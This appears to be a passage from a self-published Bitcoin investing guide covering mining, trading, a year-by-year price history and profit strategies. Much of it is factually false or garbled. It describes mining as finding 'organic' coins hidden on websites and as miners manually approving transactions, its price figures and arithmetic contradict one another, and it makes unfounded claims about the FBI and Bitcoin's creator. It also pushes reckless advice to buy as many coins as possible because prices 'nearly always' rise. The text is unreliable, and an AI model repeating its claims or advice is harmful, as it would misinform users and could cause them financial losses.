exchange and for different products,
there are also other ways that people can
get Bitcoin. This is similar to gold in
that it is able to be “mined.” People are
not rushing to Northern California,
though, to find it like they did with the
gold rush. Instead, they are flocking to
websites that have Bitcoin up for grabs
and that people must constantly try to
find the codes for. Once they find the
encryption, the Bitcoin is theirs to keep.

In the past, finding Bitcoin was much

easier because not as many people knew
about it. The popularity of Bitcoin is a
double-edged sword though when it
comes to mining. Now that more people
know about the ability to mine Bitcoin,
they are doing it, and the reserves of the
currency are running out making it harder
for people to find it. Some people have
even set up their mining process to be
professional, and people do it for the
sole purpose of trying to find it. They are
professional miners and those who work
hard to make sure that they find it. They
have dedicated all of their time working
to mining Bitcoin.
Organic Bitcoin

Even though Bitcoin isn’t necessarily

organic in the way that gold would be, it
still occurs on websites and in certain
situations naturally. These are Bitcoins
that have been encrypted to be hidden,
and the creators of the currency have left
them in places on the Internet for people
to find. They are the same as Bitcoin that
have been purchased or exchanged for
goods and services, and they can be used
in the same way as those are. As soon as
someone finds and organic Bitcoin, they
are able to put it in their wallet just like
they would with one that they got through
a different method.
It is not quite as easy as going out with a
pickaxe and looking around for Bitcoin,
though. The process is somewhat
complicated and will be found in the
next chapter but, in essence, Bitcoin
mining involves solving complicated
algorithms and putting them into practice
for Bitcoin in exchange. It is a win-win
situation for the miner and the creator of
the Bitcoin. They are able to get their
problems solved while the miner is able
to make money.

Keeping It

One of the best things that Bitcoin

owners can do with their Bitcoin is
hanging onto it and keep it safe in their
wallet. When someone purchases
Bitcoin, they should not think of it as just
another form of cash that they can spend
on the Internet. Doing this causes it to be
not as valuable and can create problems
for them if the price continues to rise. It
can be complicated to understand but
losing out on Bitcoin will make things
harder on the wallet owner.

If someone has Bitcoin and keeps it in

their virtual wallet, they will be able to
make more money of it. It is a good idea
for someone who has a lot of Bitcoin to
think of it as a stock or another type of
investment that they have made. If you
buy up 10 bars of gold, you would
probably hold onto them until they are
more valuable instead of trying to pay
for a new set of ear buds that you think
you might want from a Chinese retailer.

Think of your Bitcoin as an investment

instead of currency and you will be able
to cash in on the higher price of Bitcoin
in the future if you hold onto it.

Perhaps one of the most complicated
parts of understanding Bitcoin is
understanding where it comes from and
how it is created: mining. This is the
process by which people are able to get
Bitcoin in a way that does not involve
buying, trading or selling. It is organic,
and they are able to get Bitcoins for
doing certain tasks. The way that Bitcoin
mining works benefits both the person
who is doing the mining as well as the
Bitcoin community where the mining
prospects are coming from in the
different areas that the coins can be
found at.

The Miner

The most important part of Bitcoin

mining is the miner who is looking for
Bitcoin. This is the person who searches
to find the Bitcoin and who can make
sure that the problems get solved to be
able to get to the Bitcoin. It is an
important job and something that is
necessary for people to be able to do.
There are many miners, but only a few of
them do it on a fulltime basis that will
allow them the chance to make things
better in their community. They can mine
for different reasons, but the biggest
reason is to get more Bitcoin instead of
having to trade and sell things for them.

When a miner is first getting started, he

or she usually learns from someone else
who mines. This person shows the future
miner the “ropes” of looking for Bitcoin
and solving the problems to make sure
that they are getting Bitcoin. The miner
needs to learn the ins and outs including
the right way to solve problems, how to
understand a legitimate purchase and the
right way to make things work within the
Bitcoin community.

It is not a bad idea for people want to

get into Bitcoin mining to get started
with buying, trading and selling first.
They can learn the right way to handle
their Bitcoin which will give them a
better chance at making sure they know
what a legitimate transaction looks like
when they are doing different things in
the mining community.

While Bitcoin mining can help people to

get more Bitcoin, it is something that
does require work. You can’t just sit
back and expect to find the Bitcoin for
free when you are trying to mine it – you
must work for it.

Community Help

The Bitcoin community came up with the

idea for mining in response to a
problem. After Bitcoin had increased in
value, not everyone was able to afford
them, and the community felt that there
needed to be a way for people to be able
to get them without having to spend a lot
of money on them. This was something
that was important to the community, and
they wanted others to make sure that they
were able to get the Bitcoin that they
desired. They saw it as a problem.
The other problem that the community
had been falsified transactions. When
Bitcoin first came on the market, people
could, essentially, reuse the same
Bitcoin over and over again. Since they
did not want to be connected to banks,
there was no paper trail or any type of
record that was attached to the Bitcoin.
People took advantage of that, and it
made a lot of false transactions for the
Bitcoin and made it harder for people to
make sure that they were getting a true
Bitcoin. There were a few problems that
stemmed from this initial problem and
the community wanted to make sure that
it did not go any further than what was
happening with it.
The solution that they had to both of
these problems was simple: Bitcoin
mining. People could solve problems
that they had with the Bitcoin and be
able to earn Bitcoin from doing it. It was
a bit like a job and something that they
felt that they had to work to earn money
for. It made sense, though, that people
could do that. They were able to see the
problems, or the trails that followed the
Bitcoin, and make sure that they were
legitimate transactions. In exchange for
approving (or denying) the transaction,
they were rewarded with Bitcoin that
they could add to their own wallet.

Starting Bitcoin mining cut down on the

fraudulent transactions and the ability of
people to duplicate transactions with
Bitcoin. Every Bitcoin that is spent goes
through a miner who makes sure that it is
not one that has already been spent
somewhere else. The miner works to
make sure that the trail is accurate and
that any information that is added to it is
done so in a way that makes sense. This
does not even take extra time and is so
seamless that most people don’t even
realize when their Bitcoin has gone
through a miner.


While anyone is able to become a miner,

it does take some special software to be
able to do it in a way that is quick and
efficient (which is the goal of all
miners). The miners need to first learn
the ropes from an experienced miner or
on their own (which can be difficult).
They then need to get a certain type of
hardware to be able to run the numbers
and do the algorithms by which the
Bitcoins are spent, exchanged and

The Raspberry Pi collection is one of

the most popular hardware devices that
you can use to make sure that you have
the right equipment to be able to mine
Bitcoin. It is a good idea to use this and
to set it up in a way that will allow you
the chance to make your own math
problems and to solve them in the right
way. By using the Raspberry Pi, you can
set it up to do what you want. It functions
as a hard drive, and it will work in
combination with any monitor that you

Since it can be complicated to build

your own system, you should try to get
plans to build your mining device. This
is something that you can do by doing the
right amount of research or by using one
that was created by a different miner.
The person who you have chosen to
follow and learn about mining from will
be able to give you an idea of what you
need to use to be able to make your
Raspberry Pi work for you. Using
premade plans can help you create it in a
way that works for Bitcoin mining.

Another option would be to purchase a

completely done system for Bitcoin
mining. It is something that you can
purchase from Bitcoin mining sites and
something that will allow you the chance
to make sure that you can do things the
right way when it comes to mining.
Always making sure that you are doing
things the right way with mining can all
be done from the system and will be a
way for you to increase the amount of
mining that you can do. When you
purchase a system that is already
created, like the Avalon6, you will be
able to save the time that it would
normally take you to build your own

Collecting on Bitcoin

Once you have done the math problems

and approved or denied the transaction
with Bitcoin, you will be able to collect
on the Bitcoin that the community owes
to you for making sure that you can do
things the right way with mining. Always
making sure that you have the right
equipment is the best way to make things
better for Bitcoin mining but collecting
on the money that you have earned is
important, too. It is a good idea to do as
many as you can so that you will be able
to make as much money as possible. You
can earn more money with the more
transactions that you look at and
approve, and you will be able to add
more Bitcoin to your wallet each time
that you do it.

It is an automatic process that is done as

soon as you solve the problem and take a
look at the trail. Once you have
approved it, you will need to enter in
your wallet ID, and the Bitcoin will be
put into your wallet. This transaction,
ironically, will be sent to another miner
who will be able to approve it since it is
a legitimate one.

As you begin to mine, you will find that

it takes less time for you to make the
decisions on transactions in the
community. Not only will that help the
people who are making the transactions
because they will be able to go through
more quickly but it will help you too.
The more transactions that you approve
in a certain amount of time, the more
Bitcoin you will be able to make and
collect in your wallet. It is always a
good idea to make sure that you are
collecting on all of the Bitcoin possible.

The more that you mine, the better you

will get. The better you get at mining, the
less it will take you to make decisions.
The quicker you make decisions, the
more money you will be able to make in
each of some times that it takes you to be
able to do that. As long as you are
always getting faster at approving
transactions, you will be able to make
more money per hour from Bitcoin
mining. This will allow you to increase
all of the Bitcoin that you have and the
money that you are able to make with it.

Making Mining Happen

After you have decided that you are

going to be a Bitcoin miner, you need to
get started as quickly as possible. The
sooner you start, the sooner you can
make money from it. There are several
steps to getting started, but once you
have done these, you will be able to
make Bitcoin. The amount of Bitcoin that
you can make is limited only by your
speed and your ability to make more
money when you are in different
situations. It can be harder for you to
make the right amount of money if you do
not know what you are doing with
Bitcoin so always try your hardest to get
started as quickly as possible.

When you make the decision to mine

Bitcoin, you should find someone who
already does it. This person will be your
mentor and will be the reason that you
are able to make money and figure out
everything that there is to mining. You
should take your time and select the right
person for the job – someone who is
knowledgeable and can teach you the
things that you want to know about

Once you have done all of this, you are

ready to get started. Make sure that your
software is ready and get out there to
mine Bitcoin. You will be able to truly
start making money from it. The best part
about mining Bitcoin is that you will
eventually be able to replace a full-time
job with it. This will give you the
chance to do more with your time and
can even give you more free time. It is a
way to work from home and as your own

Some of the best Bitcoin miners can

make upwards of $1,000 per day finding
around 1 Bitcoin per day or more. These
are the people who are making the most
money from it. The bonus comes in the
fact that the Bitcoin are still growing in
value. For example, someone who was
Bitcoin mining three years ago for 10
days in a row and got 10 Bitcoins now
has 10 Bitcoins that are worth around
$10,000 total. They were not worth that
much when that person was mining, and
they have gone up in value. It is like
automatically investing the money that
you make at your “job.”

There are many different ways that you
can trade Bitcoin. You can trade it for
goods, services, for other currencies and
even with different Bitcoin. Trading
Bitcoin is similar to trading any other
type of investment and may result in you
making more money than what you could
with other investments. Because of the
way that Bitcoin works, you do not need
to work hard to be able to trade it the
right way.


When someone performs services for

someone online or in a different medium,
there are many ways that the person can
be paid for the service. One of the ways
that are becoming increasingly popular
is Bitcoin. If you do a service for
someone, you may request to be paid in
While this is something that is still
relatively unknown and not widely used,
it is more common on the Internet. If you
are doing the service online, the chances
are higher that the person would be
willing to pay for it in Bitcoin than it
would be to pay for it in another way. It
is important to note that people may
want to be paid for their services in
Bitcoin because they are able to make
more money from the Bitcoin than they
would with a more traditional form of

If you are doing a physical service

instead of an online service, it may be
less likely that you can be paid in
Bitcoin. Both parties need to own
Bitcoin to be able to do this, and both
must have their own wallet. In some
instances, it is just easier to be paid in
cash and to purchase the Bitcoin with the
cash that you have made. This will
allow you to improve on the Bitcoin.

This is just one of the ways that Bitcoin

is traded on the Internet. Since they are
not officially recognized as currency, it
is more of a trade than a payment. You
own the Bitcoin, and you can trade
someone for the services. There are
many different services that will allow
you to trade Bitcoin for them and you
can even offer your services for Bitcoin.
It is not a bad idea to do this because the
Bitcoin will be much more valuable than
getting paid on the dollar.


Goods are offered similarly to services

when it comes to Bitcoin. When
someone has a good to offer, they can
offer to sell it for either traditional forms
of payment or Bitcoin. When they choose
Bitcoin, they are going to get paid more
than if they were getting paid in cash.
There are many options that come along
with Bitcoin payments, but the best ones
are the ones that allow the buyer to pay
in Bitcoin for something that is worth
more than what they have paid for.

People will sometimes offer different

payment options for people who are
paying with Bitcoin because of the
higher value of Bitcoin. This means that
you can make sure that you are getting
the most out of the Bitcoin when you are
trying to sell things, and you can get
more for what you are paying for.
Sellers will offer this option because
they know that the Bitcoin is not only
worth more right when it is being used
but that it will also grow in value over
the time that the person has it. The longer
that they keep the Bitcoin in their wallet,
the more it will be worth for them in the
It is important to note that not all goods
can be sold for Bitcoin. Sites like Etsy
and other creation sites allow people to
purchase in Bitcoin, but not every site
will allow that. Small businesses benefit
from this because they will be able to
grow the money that they have made in
profit but it is important to note that not
all small businesses, especially those
that are new, will be able to offer
payment options in Bitcoin. It is just not
on the radar for these businesses right
now, but it is expected to become a more
popular option in the future.


Since Bitcoin can be handled in the same

way that other trading options, like
stocks, are, they are easy for people to
trade in a traditional sense. If you have
Bitcoin, you can trade them in the same
way that you would trade other types of
currency and things like stocks. While
they are not necessarily on the stock
market, you can use the same principles
that come along with the market to be
able to trade your Bitcoins.

It is a good idea to make sure that you

have a decent amount of Bitcoin before
you start to trade them in a traditional
sense. In general, you should have
around 10 Bitcoin (or close to $10,000
worth of them) before you make the
decision to start trading them. If you only
have one Bitcoin and you try to trade it,
you will need to divide it into different
parts which are great for buying and
selling but may make things more
complicated for you when you are
trading the Bitcoin.

While it is not necessarily a problem to

break your Bitcoin apart to be able to
trade it, it may make things more
complicated for you. It can be messy and
make you have dividends that are not
even. You should make sure that you
have enough Bitcoin to be able to trade
before you make the decision to do so.
There are many options when it comes to
adding more Bitcoin to your wallet but
always making sure that you have more
than enough for trading is the only way
that you can truly be successful with

One thing that you need to keep in mind

all of the time when you are trading
Bitcoin is that you need to make sure that
you are getting the most out of the
situation and that you should always
trade up. Make sure that the value of
your Bitcoin is high and that you are able
to get more Bitcoin than what you
initially had. If you do not do this, you
may lose out on money and not be able
to take full advantage of the trades that
you have.

The point of traditional trading is to

grow the amount of money that you have
in Bitcoin just from moving it around,
buying it and selling it for large margins
and great returns.


When you are buying Bitcoin, you should

make sure that you are paying the lowest
price possible for the Bitcoin. Keep an
eye on the price to figure out what the
return is going to be. If you look at the
past of the prices, you can see what the
yields will be on the Bitcoin and
accurately predict it so that it will make
more sense for you to be able to buy it.
The lower the price that you can get the
Bitcoin for, the better the return will be
and the more money you will be able to
make off of the Bitcoin.

If you notice that the trends are going in

one way or another, try to buy your
Bitcoin at that time. You should always
buy it when it is as low as possible and
make sure that you have enough money to
be able to buy as many as possible. If
you buy 3 Bitcoin at one time, you will
have those three to be able to keep in
your wallet and save up for later on. If
you look at the Bitcoin trends from the
past, you can see that Bitcoin has grown
exponentially over the past eight years.
They have jumped from less than one
cent per unit to over 1,000 dollars per
unit. If you buy them for 1,000 dollars,
you are not going to get as good as a
deal as those who paid less than one
cent, but if the price rises to 10,000
dollars per unit or more, you will be
able to enjoy the return that comes from
the Bitcoin.

The chances are that your Bitcoin price

will rise significantly over the next 12-
24 months and you will be able to cash
in on the investment that you have made.


Opposite from the way that buying

works, you need to sell your Bitcoin or
exchange it for real money, when it is at
the highest point. Throughout the day,
there will be many high points, but you
need to watch for the highest point
within a term or a quarter. This is the
point at which you will be able to make
the most amount of money, and it is
important that you are truly able to profit
off of the money that you make from the

You can figure out when the Bitcoin is

going to be at its highest by looking,
again, at the trends. There are different
trends that will make things worth it and
will make you better able to do more
with the Bitcoin that you have. Each of
these trends can change the time that you
are going to sell your Bitcoin.

Looking at the trends will give you an

idea of what the Bitcoin is going to yield
for you. Since the yield amount is often
higher than the return on the Bitcoin, you
should be careful about when you sell
the Bitcoin. It is always a good idea to
make sure that you are doing the most
when it comes to your Bitcoin. Try your
hardest to maintain all of the money that
you have and sell the Bitcoin for the
highest amount.

One thing that you can do is watch the

Bitcoin market for an entire day. Look at
the different trends and see at which
point it is at its highest. This will
generally be a few hours before the
opening of the day or a few hours after
the day has closed. Even though the day
fluctuates, you can still sell after it has

It is also a good idea to hold onto the

Bitcoin for as long as possible. You do
not want to do too much trading so that
you can keep as much money as
possible. Since Bitcoin nearly always
rise in price, you will be able to make
more money the longer that you hold
onto them for.


The point of buying and selling Bitcoin

is to get the highest trade amount
possible. Different trade amounts will
be different depending on how much you
have accumulated in Bitcoin, but you
should know that the more that you trade,
the lower the chances of being able to
make a lot of money off of the Bitcoin
will be. Try to hang onto it for as long as

If you know the right time to buy Bitcoin

and you take advantage of it in every
way possible, you will be able to make
a lot of money from Bitcoin. If you
consider the people who purchased
Bitcoin in 2009 and are still holding
onto it in 2017, you can see that they are
clearly the ones who have made a lot of
profit from it. Selling it and rebuying it
is not in your best interest when it comes
to Bitcoin even though it may be a good
idea for other investments that you have
made or that you are going to make.

The time will come that you need to get

rid of your Bitcoin. Keep an eye out for
the right time to be able to sell it. It is a
good idea to try to hang onto it for as
long as possible but selling it can truly
have its benefits. If you think of the
people who bought hundreds of dollars
worth of Bitcoin in 2009, you can see
that they are now able to sell it for
millions of dollars.

The value of Bitcoin has been steadily
rising since they were first introduced to
the market in 2009. Since they were just
a concept idea and something that not
many people knew about, they were not
worth a lot at that time. While they are
still relatively unknown, they have risen
in price by thousands of times. As they
continue to grow in popularity, it is
expected to continue to rise in value.
The outlook for Bitcoin is good as long
as people continue to learn more about

The prices that are reflected below are

reflective of the average summer value
of Bitcoin except for the year of 2017
where there is only data from the month
of January.

The price of Bitcoin was around .0001

USD. This is the value of the Bitcoin and
where it started at. This was the point of
which they were the least popular
because they had just made their
appearance on the market. People were
somewhat skeptical about the Bitcoin,
but some people chose to invest in them
at this point.

The creator of Bitcoin invested in the

most and is still considered to have the
largest Bitcoin wallet out of everyone in
the world. The United States FBI also
purchased their wallet full of Bitcoin at
this point just in case it was to rise in

Anyone who purchased Bitcoin in 2009

began to see returns on it almost
immediately. Two years after their initial
investment in the Bitcoin, they would
have a huge return on it. It is something
that many people could not have
anticipated, but the people who did
make the investment are now very
wealthy. Since they were worth so little
in 2009, it would not have cost a lot of
money to make an investment that would
change their lives. For as little as $25,
someone could have purchased 250,000
Bitcoin. Two years later, that $25 worth
would have been equal to around $3.75
The price of Bitcoin was around .07

Even though it has only been on the

market for one year, this was a major
turning point for Bitcoin and the price
that they were set at. It was 700 times
the amount that they came onto the
market at only 12 months before. It was
one of the largest and fastest returns that
anyone had seen in any market in the
history of trading.

People who had not been paying

attention to Bitcoin or who were still
leery of what Bitcoin was (or how it
would perform) began to shift their
attention to Bitcoin. Much more people
began investing in it at this point and, at
the same time, it began to be a regular
“currency” that was used online.

The cost for each unit of Bitcoin was

still relatively low compared to some of
the other shares that were found on the
market, and this was something that
people could clearly see when they were
buying it. If someone purchased around
$25 worth of Bitcoin in 2010, they
would get about 350 units of Bitcoin.
One year later, this $25 worth would be
worth $5,250.

As more people caught onto the fact that

Bitcoin was really going to be something
worth investing in, the value of Bitcoin
began to rise…very quickly.

The price of Bitcoin was 15 USD.

The need to buy more Bitcoin and the

demand that was brought about by
investors caused the price to skyrocket
from the second year into the third.
Thousands of people were pushing for
thousands of shares in Bitcoin, and this
was something that they knew was going
to take off. It was a huge increase of
money that the Bitcoin was worth and
was the first time that it was able to rise
about the one dollar mark.
This was the first time that Bitcoin
mining really became a popular thing.
While it had always been a possibility, it
was not something that people really
thought to do and was not the most
popular option. People who wanted to
get a lot more Bitcoin were able to mine
it. One of the biggest miners and most
popular miners was actually the person
who invented it, and that holds true still
in this day and age.

It rose so far beyond one dollar that it

actually made it all the way up to 15
dollars. People began clamoring for
Bitcoin but what they did not know was
that the supply of it was going to
increase too. While the demand began to
rise, so did the supply and that caused
some issues with the value.

The price of Bitcoin was 7 USD.

In 2012, Bitcoin took a huge hit from the

point that it was just one year before.
This was the first time that Bitcoin had
gone down in value and it was probably
because people did not see them as
valuable any longer. There was enough
Bitcoin to meet the demands of people
who were hoping to invest their money
in different things, and it was something
that they knew that they needed to be
able to get.

When people began to see that they

could get as many Bitcoin as they
wanted simply by purchasing them, it
drove the value down.

Any good investor knows, though, that

there is usually a slight downturn in the
value of an investment before there is a
major uptick in it. This is something that
happens with nearly any type of
investment opportunity, including stocks.
People who invest know that there are a
lot of things that they can do to make
sure that they are keeping up with the
price and that they are getting the most
for their money.

The price of Bitcoin was 100 USD.

After the downturn that happened in

2013, it came as somewhat of a surprise
for people to see that the Bitcoin surged
up to 100 USD. What came as an even
bigger surprise was the fact that, at one
point during 2013, the Bitcoin price
reached all the way up to $1,200 per
unit. This was both the first time that it
rose about $100 and the first time that it
rose about $1,000. It showed that the
year before was a one-off year and
something that was not going to happen
again in the way that different things
would be able to go on with Bitcoin.

The $100 price stood at the average for

that year, and it ended up that it would
likely be another two years before the
price would reach that $1,200 mark

The huge uptick, though, caused another

wave of investors to purchase more

It is also important to note that 2013 was

the year that the Silk Road was shut
down and millions of dollars worth of
Bitcoin that had been held by illegal
dealers were sold off or auctioned off.
During this time, the FBI acquired a huge
portion of Bitcoin which put them as one
of the biggest stakeholders. They are
among the only Bitcoin owners that are
known in the top 10% because they have
publicly announced it. The rest may own
more than them, but they have chosen
complete anonymity that is offered by

The price of Bitcoin was 600 USD.

As more people began investing in

Bitcoin, the price continued to rise. This
was something that was expected during
that year, but people began to see that
their Bitcoin investments were going to
pay off. Those who had purchased $25
worth of Bitcoin in 2009 and had held
onto it since that time could cash that in
for a smooth $150 million dollars. This
was a huge return on an investment of
only $25. The return was millions of the
original percentage of what they had

Not many people were able to hold onto

their money until that point, but the ones
who did were wise to continue hanging
onto it because the next two years would
prove to be very profitable. As more
people began to see how much the
Bitcoin really cost, they began to back
off and not as many people meant that
there would be another downturn in the
market value of the Bitcoin.

The price of Bitcoin was 220 USD.

This was in sharp contrast to the huge

rise that was seen in 2014. It was
something that people did not see
coming, and people began to clamor
around to make sure that they were
selling them so that they were able to
profit. With more Silk Roaders on trial,
people began to sell off their Bitcoin
hoping that they would still be able to
make a profit. While this was a low
point for Bitcoin, the people who chose
to continue holding onto their Bitcoin
despite the market downturn were the
ones who would be able to profit in the
long run.

Despite the fact that the $220 price was

a low point for Bitcoin, 2015 was the
second year that people would see
Bitcoin rise up to $1,200. When it hit
that point toward the end of 2015, it did
not go back down to the $220 price point
nad continued to fluctuate within $300 of
$1,000. The low point was around $700
while the highest point was $1,300.

2015 was the year that Bitcoin truly

became worth its (nonexistent) weight in
The price of Bitcoin was $1,146.

Since the price began to rise in 2015 and

stayed there throughout the year and into
2016, people began to cash in on their
Bitcoin payments. They knew that it was
going to be a good time to sell off the
money that they had acquired in Bitcoin
and they wanted to be able to make as
much money as possible from Bitcoin.
Since most things that are involved in
investing are measured in comparison to
gold, they figured since the Bitcoin was
worth the same as (and sometimes more
than) gold, that would be the time to let
it go.
In 2014, a major investment estimator
guessed that by 2018, Bitcoin would be
worth $10,000 per unit. This was a long
way off from what it was in 2016, but
there is still a 2-year difference in the
two. The exponentials are not expected
to increase that much anymore, but
anything is possible with Bitcoin since it
is in a free market and is subject to
nearly anything. The 2016 United States
presidential election could have a major
impact on the way that Bitcoin is treated
but only time will tell.

At the time that this book was written,
Bitcoin sat at $922 per unit.

This is on the low end of the past 12-

month average but is still a good number
compared to the original .0001 price that
Bitcoin was originally worth. With all of
the new political changes that are
coming to the United States, there is
expected to be a change in the Bitcoin.
Whether that is for the good or the bad of
Bitcoin is left to be determined.
Professional investors, algorithm
makers, and yield hopefuls are still
predicting that the Bitcoin will continue
to rise. There is expected to be a surge
in the economy, and that can have a great
positive effect on the free market. While
it is unlikely that the Bitcoin will be
worth $10,000 by 2018, there is still
going to be a major change in Bitcoin.
Anyone who wants in on the game
should do so in 2017 because the prices
if based on the trends are going to keep
going up.

While it is entirely possible that the

price of Bitcoin may drop for a short
time (based off of the past trends), there
is a good chance that it will have a huge
increase after that initial drop down.
The point of getting Bitcoin and
spending all of the efforts on learning
about it is to make money from it, right?
There are many options when it comes to
making money, and there isn’t a single
way that is better than the other ways to
be able to make money but you need to
decide which way is going to be the best
for you to make money so that you will
be doing the right thing with the Bitcoin
that you have (or the Bitcoin that you
want to have).

If you look at each of these ideas and do

not find one that works for you, Bitcoin
investing may not be your best option,
and you may want to consider putting
your investment money into something
else instead of wasting your time trying
to make money from Bitcoin.


Many people think that mining is the key

to being able to make a lot of Bitcoin.
They think this because they do not
believe that they are going to have to
spend any money to be able to make the
Bitcoin that they want. The biggest
problem with that is that they do have to
spend money and it is often much more
than what they would be able to just buy
the Bitcoins with and wait for them to
become mature when it comes to
different types of currency.

Bitcoin mining is not worth it for people

who only mine a few Bitcoin and then
quit. The only money that is to be had in
mining is for people who mine a large
number of Bitcoin at one time. This is
something that they need to have the right
equipment and the time to invest in. It is
a big part of the way that things are done
in mining, and there are many different
things that can make up the Bitcoin
mining experience.

The equipment alone can cost thousands

of dollars and may only result in a
person getting a few coins from the
mining process. Even if they do have the
right equipment and get it done the right
way, they may not be able to make the
coins. Instead of spending tens of
thousands of dollars, they can put that
money into buying actual Bitcoin from
reputable sources, holding onto them and
selling them for huge profits later on.

One of the biggest problems with mining

is not even knowing whether you are
going to get the Bitcoins as a result. You
may not be able to mine as good as you
thought you would, you may get fewer
problems to solve than you hoped and
you will be left with equipment that you
really can’t use for anything other than
Bitcoin mining.

As one of the biggest investment options

for Bitcoins, holding has truly made a
name for itself. The smartest Bitcoin
investors are the ones who hold onto
their Bitcoin. This is a process that is
used in many other investing situations,
but it has truly paid off for the Bitcoin
investors. Holding is one of the smartest
things that you can do when you invest in
Bitcoins, and it is something that will
allow you the chance to build the biggest

As previously discussed, the people

who invested in Bitcoin when it first
started out and held onto their Bitcoin
until now are worth millions of dollars
and are able to use that money in many
different ways. They can even make sure
that they are getting the most out of it and
that they are able to, essentially, buy
anything that they want. People who deal
in Bitcoins will even spell their
expensive boats and homes for Bitcoin
instead of ask for regular money for it.
The people who have the Bitcoin are all
within a community and deal with each
other. Until 2013, many of them did their
dealings on the silk road.

If you are going to invest in Bitcoin, it

will be easiest for you to simply hold
onto the Bitcoin. This is a no hassle, no
maintenance way to do investing. You
would simply need to buy the Bitcoin,
hold onto it in your Bitcoin wallet (and
not touch it to spend on things) while
waiting for it to mature in value. The
chances that the value will go up are
high, and you will be able to get a lot of
benefits from holding onto the Bitcoin.


Selling Bitcoin is the easiest way that

you can make money. If you have been
holding the Bitcoin for a long time or if
you just want to make a small profit off
of it, you need to make sure that you are
able to sell it for a good price. The price
that you sell it for should be higher than
the price that you purchased it for. While
it may be unrealistic to expect that you
are going to be able to sell it for
anywhere even near 200% of the price
that you paid for it, you should make
sure that you are getting, at least, a small
profit off of it.

When you have held onto your Bitcoin

for a long time, the choice can be tricky
to sell it. You may want to hold onto it
for even longer so that you can make
more profit on it. The easy way to do
this is to only sell a portion of the
Bitcoin instead of trying to sell all of it
at one time. This will allow you to make
some money off of it at the time that you
want to sell it while also still having the
chance to make a higher profit off of it at
a later time.

If you are planning on selling it right

away, you should see the average of the
price in the recent past and make sure
that you are selling it at the right time.
The trends usually stay around the same
and trying to predict when it is going to
can be tricky, but it can also be very
rewarding for you to make sure that you
are getting the most out of it. Try to find
a time when the price is high within that
week and sell it then.


You can make money as a merchant with

Bitcoin. If you have a service or a
product that you can offer to other
people, you can sell it to them for a
Bitcoin profit instead of using actual
money to get paid. The benefit to this is,
of course, the fact that you can make
money off of the Bitcoin that you have
received. While you are able to make
money off of a dollar, or real money, it
can be harder to do so or take a long
time to be able to make the money that
you want.

By offering your product or service and

asking people to pay you in Bitcoin, you
are giving yourself a chance to grow the
money with the rising value of Bitcoin. It
will allow you a chance to make sure
that you are making more money with it
because the Bitcoin value is expected to
rise in the coming years. For example, if
you charge someone $900 for a
completed portfolio redesign, you can
ask them to pay you 1 Bitcoin instead.
When they pay you that and it goes into
your wallet, it will be able to sit there.
In a few months, if the value goes up,
you can sell the Bitcoin for $1,200 or
whatever the value of the Bitcoin is then.

The biggest problem with this is if, in a

rare twist of events, the value of the
Bitcoin goes down instead of going up.
This could cause you to lose money and
would be detrimental to your ability to
make money. You will likely lose money,
and that can be a problem especially if
this is the only way that you get paid. It
is important to evaluate the risk that is
associated with it and make sure that
your payments are really worth that risk.

Day Trading

Similar to selling immediately after you

get Bitcoin, you can also day trade. This
is the act of getting Bitcoin and selling it
immediately after you have gotten it. It
all happens between the opening and the
closing of a day, and you can take
advantage of the lowest and the highest
average prices for that day. When you
choose to day trade, you may not get the
best return on your investment over a
long period of time, but you will be able
to get a lot of smaller returns on the little
investments that you make.

To day trade, you will need to find the

lowest price on the day. That is the time
when you purchase your Bitcoin. Say,
for example, that the lowest price for the
day was $913. You could purchase your
Bitcoin at that point and only need to
spend $913 on it. You would then need
to keep track of the rest of the prices and
see what the highest one was. The
highest price could be something like
$933. You would then be able to sell
your Bitcoin at that point and make $20
off of it.

The more Bitcoin that you have to sell

and to buy, the more you will be able to
profit. If you have five different Bitcoin,
then you would have been able to make
$100 per day if you were making a $20
profit on each of them. While this may
not seem like a lot of money, it will
build up over the course of a week or
even a month. You will be able to make
a decent amount of money even with low
returns. As the prices drop throughout
the day, you could repurchase the same
Bitcoin and be able to make even more
money from them. One major positive
aspect of this is even if the prices drop
significantly, you will be able to make
sure that you are still profiting from the

Whether you have heard of Bitcoin

before, own one or fewer Bitcoins or
plan to make a lot of money, you can
benefit from all of these different things.
It is a good idea to make sure that you
are following all of the advice in this
book and that you are trying your best to
make sure that you are making money.

Bitcoin investing can be very risky, so

you always need to make sure that you
assess the risks that are associated with
it. If you pay, for example, $900 for a
single Bitcoin, is that an amount of
money that you are able to afford to

Thank for making it through to the end of
this book, let’s hope it was informative
and able to provide you with all of the
tools you need to achieve your goals
whatever they may be.

The next step is to head over to your

favorite Bitcoin website and buy as
many Bitcoins as you can afford right
now. Get in on the Bitcoin action before
they go up even further in price and you
cannot afford them at all.

Finally, if you found this book useful in

any way, a review on Amazon is always

The simple term of Bitcoin can be
intimidating to some people, especially
those who have never purchased a
Bitcoin or have ever dealt in the
currency before. There are many options
when it comes to Bitcoin, and you need
to make sure that you are getting the most
out of the investment process.

Anyone who is considering investing in

Bitcoin should take their time and learn
as much about it as possible. The actual
act of purchasing a Bitcoin can be
lengthy and can cost you a lot of money
so make sure that you are as well
informed as possible. As one of the best
and most mysterious investment
opportunities, learn more about Bitcoin.
Read on to learn more about what
Bitcoin is, the way that it works to make
people money from it and how you can
make your own money for it.

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